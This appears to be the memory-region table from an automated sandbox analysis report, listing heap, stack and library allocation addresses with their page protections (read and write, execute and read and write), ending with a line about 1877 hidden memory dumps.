trusted library allocation
page read and write
1E45AE71000
trusted library allocation
page read and write
1B2B17BD000
trusted library allocation
page read and write
21F12D75000
trusted library allocation
page read and write
1E448300000
heap
page read and write
1E449F41000
trusted library allocation
page read and write
19457DA6000
heap
page read and write
1830EC00000
heap
page read and write
7FF848FB5000
trusted library allocation
page read and write
1E459E0C000
trusted library allocation
page read and write
1ADB5071000
trusted library allocation
page read and write
21F12E73000
trusted library allocation
page read and write
20681302000
heap
page read and write
21F12EB1000
trusted library allocation
page read and write
1C8FA530000
heap
page read and write
1B2B1469000
trusted library allocation
page read and write
19457CE0000
heap
page read and write
23C0000
heap
page read and write
21F12E55000
trusted library allocation
page read and write
B3F000
unkown
page read and write
7FF848EC0000
trusted library allocation
page execute and read and write
7FF848E0D000
trusted library allocation
page execute and read and write
17FF000
stack
page read and write
1B2C1441000
trusted library allocation
page read and write
21F12E41000
trusted library allocation
page read and write
21F29B3D000
heap
page read and write
21F21978000
trusted library allocation
page read and write
1415000
heap
page read and write
1D135850000
heap
page read and write
1924D380000
heap
page execute and read and write
50CB67E000
stack
page read and write
1E45ADD1000
trusted library allocation
page read and write
21F12DE1000
trusted library allocation
page read and write
21F12F0B000
trusted library allocation
page read and write
19232F17000
heap
page read and write
21F12C5D000
trusted library allocation
page read and write
1D291D90000
heap
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
1ADB509B000
trusted library allocation
page read and write
1B2B1731000
trusted library allocation
page read and write
21F12EC9000
trusted library allocation
page read and write
21F12EE5000
trusted library allocation
page read and write
1B2B1453000
trusted library allocation
page read and write
21F2BB3D000
heap
page read and write
19457D45000
heap
page read and write
7FF848E1B000
trusted library allocation
page execute and read and write
21F12EC3000
trusted library allocation
page read and write
21F0F880000
heap
page read and write
21F2A702000
heap
page read and write
324E000
trusted library allocation
page read and write
6B8000
heap
page read and write
1B2B168F000
trusted library allocation
page read and write
2898B5A9000
trusted library allocation
page read and write
19234ED3000
trusted library allocation
page read and write
1B2B14BF000
trusted library allocation
page read and write
1E449DCA000
trusted library allocation
page read and write
21F2A82F000
heap
page read and write
7FF848FA0000
trusted library allocation
page read and write
22E0000
trusted library allocation
page read and write
21F2B5CB000
heap
page read and write
7FF848E04000
trusted library allocation
page read and write
21F12CC9000
trusted library allocation
page read and write
1ADB52CB000
trusted library allocation
page read and write
1E459E01000
trusted library allocation
page read and write
289897AB000
heap
page read and write
21F2B6B8000
heap
page read and write
21F12D9D000
trusted library allocation
page read and write
21F2B338000
heap
page read and write
21F12E6B000
trusted library allocation
page read and write
361A3FE000
stack
page read and write
21F2A0FC000
heap
page read and write
21F2B61D000
heap
page read and write
21F12C71000
trusted library allocation
page read and write
21F12D8D000
trusted library allocation
page read and write
1E459F80000
trusted library allocation
page read and write
21F2B18E000
heap
page read and write
19232ECB000
heap
page read and write
21F12E7B000
trusted library allocation
page read and write
21F12E1F000
trusted library allocation
page read and write
65A000
heap
page read and write
19234EBE000
trusted library allocation
page read and write
1E44A27C000
trusted library allocation
page read and write
7FF848E00000
trusted library allocation
page read and write
1ADB541F000
trusted library allocation
page read and write
21F12E5F000
trusted library allocation
page read and write
1E459E1B000
trusted library allocation
page read and write
1E45A496000
trusted library allocation
page read and write
1C8FA587000
heap
page read and write
1E4482D0000
heap
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
1D135790000
heap
page read and write
1ADB52CF000
trusted library allocation
page read and write
21F12D31000
trusted library allocation
page read and write
21F12D17000
trusted library allocation
page read and write
2898B3BB000
trusted library allocation
page read and write
6FDA156000
stack
page read and write
4A30000
heap
page execute and read and write
21F12DC9000
trusted library allocation
page read and write
321F000
stack
page read and write
D54000
trusted library allocation
page read and write
21F12E25000
trusted library allocation
page read and write
525E000
stack
page read and write
21F22057000
trusted library allocation
page read and write
21F12CFB000
trusted library allocation
page read and write
21F12C41000
trusted library allocation
page read and write
7778CFE000
stack
page read and write
3619F7E000
stack
page read and write
16B0000
heap
page read and write
2898B6F9000
trusted library allocation
page read and write
1ADB3745000
heap
page read and write
21F12E79000
trusted library allocation
page read and write
1830EF95000
heap
page read and write
21F2B084000
heap
page read and write
3067000
trusted library allocation
page execute and read and write
7FF848F80000
trusted library allocation
page read and write
21F12D1B000
trusted library allocation
page read and write
21F12C2F000
trusted library allocation
page read and write
1E449F69000
trusted library allocation
page read and write
685000
heap
page read and write
1E44A0CF000
trusted library allocation
page read and write
28989880000
heap
page read and write
21F12C43000
trusted library allocation
page read and write
29974C7B000
heap
page read and write
21F2B042000
heap
page read and write
7FF848E4C000
trusted library allocation
page execute and read and write
7FF848ED0000
trusted library allocation
page execute and read and write
7FF848E5C000
trusted library allocation
page execute and read and write
21F12DF3000
trusted library allocation
page read and write
21F12D33000
trusted library allocation
page read and write
1E39F4D5000
heap
page read and write
1E459EF8000
trusted library allocation
page read and write
21F12CC3000
trusted library allocation
page read and write
21F12E77000
trusted library allocation
page read and write
22B16330000
heap
page read and write
21F2A0F7000
heap
page read and write
1E44A291000
trusted library allocation
page read and write
1670000
trusted library allocation
page read and write
2898B6AE000
trusted library allocation
page read and write
1830EC9C000
heap
page read and write
1E4638A0000
heap
page read and write
1B2B16F3000
trusted library allocation
page read and write
1E449ECD000
trusted library allocation
page read and write
2898B6E9000
trusted library allocation
page read and write
7FF848FC0000
trusted library allocation
page read and write
21F29DF0000
heap
page read and write
6FDA6FE000
stack
page read and write
6FDA187000
stack
page read and write
1E459E90000
trusted library allocation
page read and write
B10000
trusted library allocation
page read and write
1E45A727000
trusted library allocation
page read and write
21F12EAF000
trusted library allocation
page read and write
1E39F239000
heap
page read and write
21F2AD00000
heap
page read and write
21F2BE92000
heap
page read and write
2898B39F000
trusted library allocation
page read and write
7FF848E13000
trusted library allocation
page read and write
21F12CA3000
trusted library allocation
page read and write
19457EF0000
heap
page read and write
7FF848E14000
trusted library allocation
page read and write
32B2000
trusted library allocation
page read and write
75B1DDC000
stack
page read and write
21F219AB000
trusted library allocation
page read and write
1ADB532B000
trusted library allocation
page read and write
A00000
heap
page read and write
21F21923000
trusted library allocation
page read and write
21F2B73C000
heap
page read and write
21F2B547000
heap
page read and write
21F12CF3000
trusted library allocation
page read and write
1E448320000
heap
page read and write
1533000
heap
page read and write
20D73660000
heap
page read and write
770000
heap
page read and write
21F21AB8000
trusted library allocation
page read and write
21F219CD000
trusted library allocation
page read and write
361A6FD000
stack
page read and write
1E45A4DE000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page execute and read and write
19232F75000
heap
page read and write
EE0000
heap
page read and write
21F12D4F000
trusted library allocation
page read and write
1E45A771000
trusted library allocation
page read and write
21F12D2D000
trusted library allocation
page read and write
183D000
stack
page read and write
A3F0BFE000
stack
page read and write
21F12DF9000
trusted library allocation
page read and write
21F12CAD000
trusted library allocation
page read and write
21F12D3B000
trusted library allocation
page read and write
1ADB5429000
trusted library allocation
page read and write
7FF848DF0000
trusted library allocation
page read and write
32A4000
trusted library allocation
page read and write
1ADB3535000
heap
page read and write
21F12D23000
trusted library allocation
page read and write
1ADB52C9000
trusted library allocation
page read and write
1E459F70000
trusted library allocation
page read and write
9FE000
stack
page read and write
21F12CAB000
trusted library allocation
page read and write
67D000
heap
page read and write
8C0000
heap
page read and write
D5D000
trusted library allocation
page execute and read and write
1B2B17AE000
trusted library allocation
page read and write
22B162F0000
heap
page read and write
19457D20000
heap
page read and write
7FF848DF4000
trusted library allocation
page read and write
21F2AEF5000
heap
page read and write
21F12E4B000
trusted library allocation
page read and write
1E45B687000
trusted library allocation
page read and write
1E45A571000
trusted library allocation
page read and write
21F12CA1000
trusted library allocation
page read and write
7FF848E14000
trusted library allocation
page read and write
21F220A5000
trusted library allocation
page read and write
C7D27FF000
stack
page read and write
19457DDF000
heap
page read and write
1ADB52BA000
trusted library allocation
page read and write
21F12E65000
trusted library allocation
page read and write
7FF848F9B000
trusted library allocation
page read and write
21F12D99000
trusted library allocation
page read and write
21F12D7D000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page read and write
21F12DF7000
trusted library allocation
page read and write
21F12ED3000
trusted library allocation
page read and write
4241000
trusted library allocation
page read and write
29974E50000
heap
page read and write
1E45ADB1000
trusted library allocation
page read and write
21F12DB5000
trusted library allocation
page read and write
21F12E43000
trusted library allocation
page read and write
1E449DBE000
trusted library allocation
page read and write
20947820000
heap
page read and write
1517000
heap
page read and write
2898B353000
trusted library allocation
page read and write
1E462747000
heap
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
21F2A789000
heap
page read and write
1ADB36C0000
heap
page execute and read and write
21F2B97F000
heap
page read and write
1E459DAE000
trusted library allocation
page read and write
14FA000
heap
page read and write
7FF848E3B000
trusted library allocation
page execute and read and write
1E45A587000
trusted library allocation
page read and write
21F12E99000
trusted library allocation
page read and write
1ADB507F000
trusted library allocation
page read and write
4F7F000
stack
page read and write
21F2AFE2000
heap
page read and write
20D73490000
heap
page read and write
21F2C0B7000
heap
page read and write
1B2B1699000
trusted library allocation
page read and write
1ADB34C0000
trusted library allocation
page read and write
21F12F07000
trusted library allocation
page read and write
289898D0000
trusted library allocation
page read and write
7FF848F90000
trusted library allocation
page read and write
1E449DCF000
trusted library allocation
page read and write
21F2AF92000
heap
page read and write
21F12CBB000
trusted library allocation
page read and write
21F219A3000
trusted library allocation
page read and write
21F12EBF000
trusted library allocation
page read and write
1E4480F0000
heap
page read and write
1561000
heap
page read and write
ED0000
trusted library allocation
page execute and read and write
21F12EFB000
trusted library allocation
page read and write
1ADB52D9000
trusted library allocation
page read and write
7FF848DF3000
trusted library allocation
page execute and read and write
3CA1000
trusted library allocation
page read and write
1B2B14C3000
trusted library allocation
page read and write
539E000
stack
page read and write
1E45B56F000
trusted library allocation
page read and write
20D737E0000
heap
page read and write
21F2B000000
heap
page read and write
21F2B343000
heap
page read and write
21F2A46E000
heap
page read and write
9AF43FA000
stack
page read and write
1E45A3C1000
trusted library allocation
page read and write
21F2A6C0000
heap
page read and write
21F2A27D000
heap
page read and write
21F12C95000
trusted library allocation
page read and write
289899E5000
heap
page read and write
7FF848E1B000
trusted library allocation
page execute and read and write
21F2B505000
heap
page read and write
20D735FB000
heap
page read and write
1E449DB8000
trusted library allocation
page read and write
F40000
heap
page read and write
28D85325000
heap
page read and write
5B0E000
stack
page read and write
650000
heap
page read and write
21F12C7D000
trusted library allocation
page read and write
8B0000
heap
page read and write
1E459ED8000
trusted library allocation
page read and write
20D735D9000
heap
page read and write
B7E000
stack
page read and write
21F12DA9000
trusted library allocation
page read and write
6FDA4FF000
stack
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
1B2B14AF000
trusted library allocation
page read and write
217C506000
stack
page read and write
21F12DB1000
trusted library allocation
page read and write
5800000
heap
page execute and read and write
21F2B242000
heap
page read and write
21F12C6D000
trusted library allocation
page read and write
21F12ED5000
trusted library allocation
page read and write
21F12CF9000
trusted library allocation
page read and write
1280000
trusted library allocation
page read and write
21F12E89000
trusted library allocation
page read and write
21F12D41000
trusted library allocation
page read and write
1E459E48000
trusted library allocation
page read and write
1E45AE67000
trusted library allocation
page read and write
83EB7FE000
stack
page read and write
1B2B1694000
trusted library allocation
page read and write
1C8FA8A5000
heap
page read and write
21F2AFF6000
heap
page read and write
3153F6E000
stack
page read and write
21F12E2B000
trusted library allocation
page read and write
1E45B487000
trusted library allocation
page read and write
1E44A1EC000
trusted library allocation
page read and write
B23000
trusted library allocation
page execute and read and write
21F2A5B8000
heap
page read and write
19232ED8000
heap
page read and write
16A0000
trusted library allocation
page read and write
C7D230C000
stack
page read and write
31548FE000
stack
page read and write
209479A0000
heap
page read and write
21F12CD7000
trusted library allocation
page read and write
19457B50000
unkown
page readonly
7FF848E4C000
trusted library allocation
page execute and read and write
21F12EA5000
trusted library allocation
page read and write
1E449EC9000
trusted library allocation
page read and write
21F12DB9000
trusted library allocation
page read and write
21F2B9C1000
heap
page read and write
28989870000
heap
page read and write
750000
heap
page read and write
1E45A6B1000
trusted library allocation
page read and write
21F12C4B000
trusted library allocation
page read and write
1E45B44E000
trusted library allocation
page read and write
F00000
heap
page read and write
21F12ECD000
trusted library allocation
page read and write
F9D000
heap
page read and write
1ADB53DE000
trusted library allocation
page read and write
21F12DA7000
trusted library allocation
page read and write
21F12D15000
trusted library allocation
page read and write
7FF848E2D000
trusted library allocation
page execute and read and write
1E4625B0000
heap
page read and write
7FF848EA6000
trusted library allocation
page read and write
21F12E69000
trusted library allocation
page read and write
21F12E1D000
trusted library allocation
page read and write
7FF848F92000
trusted library allocation
page read and write
21F12DC3000
trusted library allocation
page read and write
6FDA18E000
stack
page read and write
21F12E35000
trusted library allocation
page read and write
22B16360000
heap
page read and write
16A2000
trusted library allocation
page read and write
21F12F0D000
trusted library allocation
page read and write
1ADB50E5000
trusted library allocation
page read and write
21F12EF1000
trusted library allocation
page read and write
90EA89C000
stack
page read and write
1690000
trusted library allocation
page read and write
9AF3CFE000
stack
page read and write
21F2B8AA000
heap
page read and write
1E45B42B000
trusted library allocation
page read and write
21F12DD5000
trusted library allocation
page read and write
1E459F78000
trusted library allocation
page read and write
7FF848EC6000
trusted library allocation
page execute and read and write
2898B5F3000
trusted library allocation
page read and write
1E45B4C4000
trusted library allocation
page read and write
21F12D63000
trusted library allocation
page read and write
7FF848DF2000
trusted library allocation
page read and write
20D735EA000
heap
page read and write
21F12DD3000
trusted library allocation
page read and write
21F12D35000
trusted library allocation
page read and write
21F12DE5000
trusted library allocation
page read and write
1B2AF9F0000
heap
page read and write
1E45A44B000
trusted library allocation
page read and write
1B2B1451000
trusted library allocation
page read and write
21F12D73000
trusted library allocation
page read and write
7FF848ECC000
trusted library allocation
page execute and read and write
21F2BCCD000
heap
page read and write
7FF848EC0000
trusted library allocation
page read and write
21F12E0F000
trusted library allocation
page read and write
1E45B4A3000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page read and write
21F220B6000
trusted library allocation
page read and write
21F21ACD000
trusted library allocation
page read and write
19457E71000
heap
page read and write
19459C0A000
trusted library allocation
page read and write
209477D0000
heap
page read and write
20681320000
heap
page read and write
192333D5000
heap
page read and write
1ADB50EF000
trusted library allocation
page read and write
21F12D19000
trusted library allocation
page read and write
A3F00FE000
stack
page read and write
1ADB3510000
heap
page read and write
1E39F210000
heap
page read and write
19459A18000
trusted library allocation
page read and write
2898B3B5000
trusted library allocation
page read and write
21F12EF9000
trusted library allocation
page read and write
206814D5000
heap
page read and write
21F2B113000
heap
page read and write
1B2B14C1000
trusted library allocation
page read and write
21F211E1000
trusted library allocation
page read and write
1ADB50E9000
trusted library allocation
page read and write
361BBFA000
stack
page read and write
1E45B707000
trusted library allocation
page read and write
5D1E000
stack
page read and write
21F2209E000
trusted library allocation
page read and write
AD570FE000
stack
page read and write
21F12EDD000
trusted library allocation
page read and write
20D73660000
heap
page read and write
B24000
trusted library allocation
page read and write
9B0000
heap
page read and write
21F29B5D000
heap
page read and write
20947AC0000
heap
page read and write
2898B6E7000
trusted library allocation
page read and write
4D5E000
stack
page read and write
21F12C8D000
trusted library allocation
page read and write
85C0E7F000
stack
page read and write
21F0F7C0000
trusted library allocation
page read and write
7FF848E14000
trusted library allocation
page read and write
81F991C000
stack
page read and write
2898B631000
trusted library allocation
page read and write
21F2A5C7000
heap
page read and write
1E449F56000
trusted library allocation
page read and write
2068131C000
heap
page read and write
217C53E000
stack
page read and write
1B2AF91B000
heap
page read and write
1B2B1449000
trusted library allocation
page read and write
1E45ADDC000
trusted library allocation
page read and write
1E45A49F000
trusted library allocation
page read and write
1E45A6A7000
trusted library allocation
page read and write
168D000
trusted library allocation
page execute and read and write
289897F7000
heap
page read and write
21F2BD68000
heap
page read and write
1ADB50E1000
trusted library allocation
page read and write
692000
heap
page read and write
20681331000
heap
page read and write
1924D3F0000
heap
page read and write
1E45B4F1000
trusted library allocation
page read and write
21F2AEAD000
heap
page read and write
7FF848EB6000
trusted library allocation
page read and write
2310E2E7000
heap
page read and write
7FF848EC6000
trusted library allocation
page read and write
1E44A0B1000
trusted library allocation
page read and write
21F12D4D000
trusted library allocation
page read and write
2307000
trusted library allocation
page execute and read and write
21F12C97000
trusted library allocation
page read and write
2898B63B000
trusted library allocation
page read and write
19233150000
trusted library allocation
page read and write
1ADB50F5000
trusted library allocation
page read and write
24EE000
stack
page read and write
21F22088000
trusted library allocation
page read and write
32B6000
trusted library allocation
page read and write
21F2BF35000
heap
page read and write
20947AC5000
heap
page read and write
154B000
heap
page read and write
1ADB3740000
heap
page read and write
1B2AFA60000
trusted library allocation
page read and write
24F0000
heap
page read and write
7FF848E02000
trusted library allocation
page read and write
21F12DFB000
trusted library allocation
page read and write
A3EFFFE000
stack
page read and write
28989630000
heap
page read and write
21F12D79000
trusted library allocation
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
21F2B4C3000
heap
page read and write
1E39F200000
heap
page read and write
21F12EBB000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page execute and read and write
28D85130000
heap
page read and write
21F2A101000
heap
page read and write
7FF848FC4000
trusted library allocation
page read and write
1E39F4D0000
heap
page read and write
21F2124D000
trusted library allocation
page read and write
21F12C63000
trusted library allocation
page read and write
19234B77000
trusted library allocation
page read and write
1E45ADA7000
trusted library allocation
page read and write
1E45A58F000
trusted library allocation
page read and write
29974C5B000
heap
page read and write
21F12C53000
trusted library allocation
page read and write
1ADB52C4000
trusted library allocation
page read and write
AD574FF000
stack
page read and write
2898B341000
trusted library allocation
page read and write
21F12E13000
trusted library allocation
page read and write
21F12DDF000
trusted library allocation
page read and write
21F2BAFB000
heap
page read and write
21F12DFD000
trusted library allocation
page read and write
20D735A0000
heap
page read and write
361AEFB000
stack
page read and write
21F2B481000
heap
page read and write
19232EEA000
heap
page read and write
2898B63D000
trusted library allocation
page read and write
21F2B2F6000
heap
page read and write
21F12EE1000
trusted library allocation
page read and write
21F12F01000
trusted library allocation
page read and write
21F2AE41000
heap
page read and write
21F0F7F0000
trusted library allocation
page read and write
1E45A5FC000
trusted library allocation
page read and write
21F12EDF000
trusted library allocation
page read and write
21F0F830000
trusted library allocation
page read and write
21F21B8D000
trusted library allocation
page read and write
19457B52000
unkown
page readonly
21F12D77000
trusted library allocation
page read and write
2094780C000
heap
page read and write
21F2A67E000
heap
page read and write
21F21B43000
trusted library allocation
page read and write
83EB4FE000
stack
page read and write
1ADB3650000
heap
page read and write
21F2BDAA000
heap
page read and write
20D73630000
heap
page read and write
21F2B612000
heap
page read and write
1E4482D5000
heap
page read and write
1E45AD6F000
trusted library allocation
page read and write
1924D404000
heap
page read and write
FD8E35F000
stack
page read and write
20D7368C000
heap
page read and write
28D85320000
heap
page read and write
1D291DC0000
heap
page read and write
20947810000
heap
page read and write
21F12C85000
trusted library allocation
page read and write
7FF848FC3000
trusted library allocation
page read and write
1ADB50D7000
trusted library allocation
page read and write
21F2B8EC000
heap
page read and write
21F12E57000
trusted library allocation
page read and write
13A0000
heap
page read and write
21F2B696000
heap
page read and write
21F12D95000
trusted library allocation
page read and write
7FF848DF2000
trusted library allocation
page read and write
1B2AFA50000
trusted library allocation
page read and write
217C536000
stack
page read and write
21F12DCF000
trusted library allocation
page read and write
7FF848F99000
trusted library allocation
page read and write
21F12C81000
trusted library allocation
page read and write
12F0000
heap
page read and write
21F12CA5000
trusted library allocation
page read and write
AD575F9000
stack
page read and write
21F2A871000
heap
page read and write
77785FE000
stack
page read and write
21F12EF5000
trusted library allocation
page read and write
49E0000
trusted library allocation
page read and write
21F2AA80000
heap
page read and write
19457D80000
trusted library allocation
page read and write
7A0000
heap
page read and write
29974CA2000
heap
page read and write
21F12EA1000
trusted library allocation
page read and write
21F12E19000
trusted library allocation
page read and write
533E000
stack
page read and write
1683000
trusted library allocation
page execute and read and write
7FF848F90000
trusted library allocation
page read and write
7FF848E2B000
trusted library allocation
page execute and read and write
3154BFE000
stack
page read and write
21F12C4D000
trusted library allocation
page read and write
20D73630000
heap
page read and write
21F12C33000
trusted library allocation
page read and write
19457DA0000
heap
page read and write
21F2A034000
heap
page read and write
1B2B1499000
trusted library allocation
page read and write
21F2AEA7000
heap
page read and write
1E45B53C000
trusted library allocation
page read and write
21F12EF7000
trusted library allocation
page read and write
2898B3C1000
trusted library allocation
page read and write
21F2A747000
heap
page read and write
AD572FE000
stack
page read and write
7FF848F92000
trusted library allocation
page read and write
19234EC1000
trusted library allocation
page read and write
21F29EE2000
heap
page read and write
1B2AFAD0000
heap
page read and write
7FF848EF6000
trusted library allocation
page execute and read and write
23E0000
heap
page execute and read and write
21F0F695000
heap
page read and write
21F2B33E000
heap
page read and write
1B2B16A1000
trusted library allocation
page read and write
1E459E15000
trusted library allocation
page read and write
7FF848DED000
trusted library allocation
page execute and read and write
20681306000
heap
page read and write
21F2A2A0000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
3062000
trusted library allocation
page read and write
28989760000
heap
page read and write
9AF3FFD000
stack
page read and write
21F12D01000
trusted library allocation
page read and write
1ADB536B000
trusted library allocation
page read and write
A0A000
heap
page read and write
194721D7000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
21F2B45A000
heap
page read and write
21F2AF79000
heap
page read and write
7FF848EA6000
trusted library allocation
page read and write
9FE000
stack
page read and write
21F2BBBF000
heap
page read and write
21F2A1A3000
heap
page read and write
1E44A2B6000
trusted library allocation
page read and write
12B0000
heap
page execute and read and write
21F12ECB000
trusted library allocation
page read and write
2898B3A5000
trusted library allocation
page read and write
21F12E01000
trusted library allocation
page read and write
1E459EC0000
trusted library allocation
page read and write
1E45B57C000
trusted library allocation
page read and write
1ADB52D1000
trusted library allocation
page read and write
1ADB540D000
trusted library allocation
page read and write
1E45A4F3000
trusted library allocation
page read and write
31547FF000
stack
page read and write
7FF848E1B000
trusted library allocation
page execute and read and write
1830EC87000
heap
page read and write
21F0F7E3000
heap
page read and write
2898B3B7000
trusted library allocation
page read and write
13EE000
stack
page read and write
1E459E80000
trusted library allocation
page read and write
21F2BFF2000
heap
page read and write
7FF848DFD000
trusted library allocation
page execute and read and write
21F2B75E000
heap
page read and write
2898B36D000
trusted library allocation
page read and write
21F2A374000
heap
page read and write
1830EC60000
heap
page read and write
21F12CD3000
trusted library allocation
page read and write
1E449F3F000
trusted library allocation
page read and write
1E45A3A1000
trusted library allocation
page read and write
2898B6C3000
trusted library allocation
page read and write
2898B6F7000
trusted library allocation
page read and write
1E449B50000
trusted library allocation
page read and write
19459850000
heap
page read and write
21F12E59000
trusted library allocation
page read and write
21F12CF1000
trusted library allocation
page read and write
1410000
heap
page read and write
29974C73000
heap
page read and write
21F219B8000
trusted library allocation
page read and write
28989755000
heap
page read and write
7FF848EAC000
trusted library allocation
page execute and read and write
21F12DC1000
trusted library allocation
page read and write
21F29B00000
heap
page read and write
7FF848F10000
trusted library allocation
page execute and read and write
21F12EBD000
trusted library allocation
page read and write
1E44A092000
trusted library allocation
page read and write
21F21AA3000
trusted library allocation
page read and write
D53000
trusted library allocation
page execute and read and write
1E44A1FE000
trusted library allocation
page read and write
19232F95000
heap
page read and write
194599E7000
trusted library allocation
page read and write
19459910000
heap
page execute and read and write
1B2AF8A0000
heap
page read and write
7FF848F99000
trusted library allocation
page read and write
21F12D85000
trusted library allocation
page read and write
21F12E7D000
trusted library allocation
page read and write
537C000
stack
page read and write
E6B000
trusted library allocation
page execute and read and write
1E448108000
heap
page read and write
1E44A172000
trusted library allocation
page read and write
1E4481F2000
heap
page read and write
20681270000
heap
page read and write
21F2B846000
heap
page read and write
21F12C4F000
trusted library allocation
page read and write
7FF848FF2000
trusted library allocation
page read and write
1ADB5083000
trusted library allocation
page read and write
21F12D7B000
trusted library allocation
page read and write
21F12676000
trusted library allocation
page read and write
21F2125D000
trusted library allocation
page read and write
21F2192D000
trusted library allocation
page read and write
1E45A4C3000
trusted library allocation
page read and write
21F2B5CF000
heap
page read and write
7FF848E3C000
trusted library allocation
page execute and read and write
21F2A500000
heap
page read and write
20D7361F000
heap
page read and write
E67000
trusted library allocation
page execute and read and write
23F67D9B000
heap
page read and write
21F2B888000
heap
page read and write
21F12D07000
trusted library allocation
page read and write
1ADB5419000
trusted library allocation
page read and write
1B2B146D000
trusted library allocation
page read and write
21F0F7E0000
heap
page read and write
1E4628F0000
heap
page read and write
7FF848FC0000
trusted library allocation
page read and write
3255000
trusted library allocation
page read and write
9E0000
heap
page read and write
361A5FE000
stack
page read and write
1E45A4A7000
trusted library allocation
page read and write
1E45B43B000
trusted library allocation
page read and write
1D291E60000
heap
page read and write
217C51E000
stack
page read and write
F5D000
heap
page read and write
7FF848DF0000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page read and write
28989730000
heap
page read and write
1E459D50000
trusted library allocation
page read and write
21F12E8F000
trusted library allocation
page read and write
1E448100000
heap
page read and write
21F12E15000
trusted library allocation
page read and write
1830EE30000
heap
page read and write
21F12D39000
trusted library allocation
page read and write
1E46273D000
heap
page read and write
7FF848DFD000
trusted library allocation
page execute and read and write
21F0F6EB000
heap
page read and write
21F12D1F000
trusted library allocation
page read and write
1E45B45B000
trusted library allocation
page read and write
32B8000
trusted library allocation
page read and write
21F2AEBD000
heap
page read and write
21F0F7D0000
heap
page read and write
21F12CCF000
trusted library allocation
page read and write
21F12E3D000
trusted library allocation
page read and write
1C8FA520000
heap
page read and write
21F12E31000
trusted library allocation
page read and write
1E44811B000
heap
page read and write
21F12C8B000
trusted library allocation
page read and write
21F12E67000
trusted library allocation
page read and write
1ADB3430000
heap
page read and write
1B2B17B7000
trusted library allocation
page read and write
3220000
trusted library allocation
page execute and read and write
19233140000
heap
page read and write
A3F0EFE000
stack
page read and write
187E000
stack
page read and write
30CE000
stack
page read and write
1B2B14B1000
trusted library allocation
page read and write
2898B6DD000
trusted library allocation
page read and write
31545FD000
stack
page read and write
F63000
heap
page read and write
19459D37000
trusted library allocation
page read and write
21F12E27000
trusted library allocation
page read and write
1B2B14A3000
trusted library allocation
page read and write
7FF848DF3000
trusted library allocation
page execute and read and write
7FF848E96000
trusted library allocation
page read and write
1E45B3FD000
trusted library allocation
page read and write
21F12E81000
trusted library allocation
page read and write
21F12DA5000
trusted library allocation
page read and write
21F0F720000
heap
page read and write
1E45B483000
trusted library allocation
page read and write
7FF848E20000
trusted library allocation
page read and write
21F2A3C8000
heap
page read and write
1E45A416000
trusted library allocation
page read and write
19459D31000
trusted library allocation
page read and write
77784FF000
stack
page read and write
1E459EA7000
trusted library allocation
page read and write
7FF848F9E000
trusted library allocation
page read and write
A3EF74E000
stack
page read and write
1B2B14A7000
trusted library allocation
page read and write
1E45AE91000
trusted library allocation
page read and write
1ADB5323000
trusted library allocation
page read and write
20681290000
heap
page read and write
1E45A5A7000
trusted library allocation
page read and write
1B2B16A5000
trusted library allocation
page read and write
7FF848DF3000
trusted library allocation
page execute and read and write
20947750000
heap
page read and write
1E449F03000
trusted library allocation
page read and write
21F12DE3000
trusted library allocation
page read and write
21F12EED000
trusted library allocation
page read and write
7FF848EA6000
trusted library allocation
page read and write
21F12E39000
trusted library allocation
page read and write
1D1357C0000
heap
page read and write
21F12C51000
trusted library allocation
page read and write
1ADB38C0000
heap
page read and write
217CBFE000
stack
page read and write
1E45B4E4000
trusted library allocation
page read and write
7FF848EAC000
trusted library allocation
page execute and read and write
1680000
trusted library allocation
page read and write
21F2C014000
heap
page read and write
1B2B17D9000
trusted library allocation
page read and write
21F12EC5000
trusted library allocation
page read and write
1E45A49C000
trusted library allocation
page read and write
1B2AFAD5000
heap
page read and write
31546FE000
stack
page read and write
19457F95000
heap
page read and write
21F12C8F000
trusted library allocation
page read and write
B30000
heap
page read and write
1E46270D000
heap
page read and write
289897B5000
heap
page read and write
1830EF90000
heap
page read and write
21F211F0000
trusted library allocation
page read and write
1E44A17A000
trusted library allocation
page read and write
21F2BA25000
heap
page read and write
206812E0000
heap
page read and write
217C54C000
stack
page read and write
19234D9A000
trusted library allocation
page read and write
523E000
stack
page read and write
21F11272000
trusted library allocation
page read and write
7FF848FA9000
trusted library allocation
page read and write
21F12D83000
trusted library allocation
page read and write
21F0F626000
heap
page read and write
21F12CFF000
trusted library allocation
page read and write
21F12CF7000
trusted library allocation
page read and write
AD576FE000
stack
page read and write
21F2A40A000
heap
page read and write
54DE000
stack
page read and write
1ADB52D3000
trusted library allocation
page read and write
19457D00000
heap
page read and write
21F12D97000
trusted library allocation
page read and write
21F2A63C000
heap
page read and write
4D9E000
stack
page read and write
19457EA0000
trusted library allocation
page read and write
21F12E71000
trusted library allocation
page read and write
7FF848EB0000
trusted library allocation
page read and write
11D0000
heap
page read and write
32B0000
trusted library allocation
page read and write
21F12D89000
trusted library allocation
page read and write
21F2204D000
trusted library allocation
page read and write
1E45B751000
trusted library allocation
page read and write
21F29B87000
heap
page read and write
1ADB5099000
trusted library allocation
page read and write
2898B5A1000
trusted library allocation
page read and write
21F12CF5000
trusted library allocation
page read and write
D00000
heap
page read and write
21F12DF1000
trusted library allocation
page read and write
21F2C036000
heap
page read and write
65E000
heap
page read and write
21F12E03000
trusted library allocation
page read and write
21F21AAD000
trusted library allocation
page read and write
21F12E49000
trusted library allocation
page read and write
83EB8FE000
stack
page read and write
1B2B1430000
heap
page read and write
21F12CA9000
trusted library allocation
page read and write
2898B5A3000
trusted library allocation
page read and write
21F12D51000
trusted library allocation
page read and write
23F68030000
heap
page read and write
AD577FE000
stack
page read and write
1E46274C000
heap
page read and write
29974C50000
heap
page read and write
1E45B551000
trusted library allocation
page read and write
1E44A0DB000
trusted library allocation
page read and write
1E39F230000
heap
page read and write
2094780B000
heap
page read and write
There are 1877 hidden memdumps, click here to show them.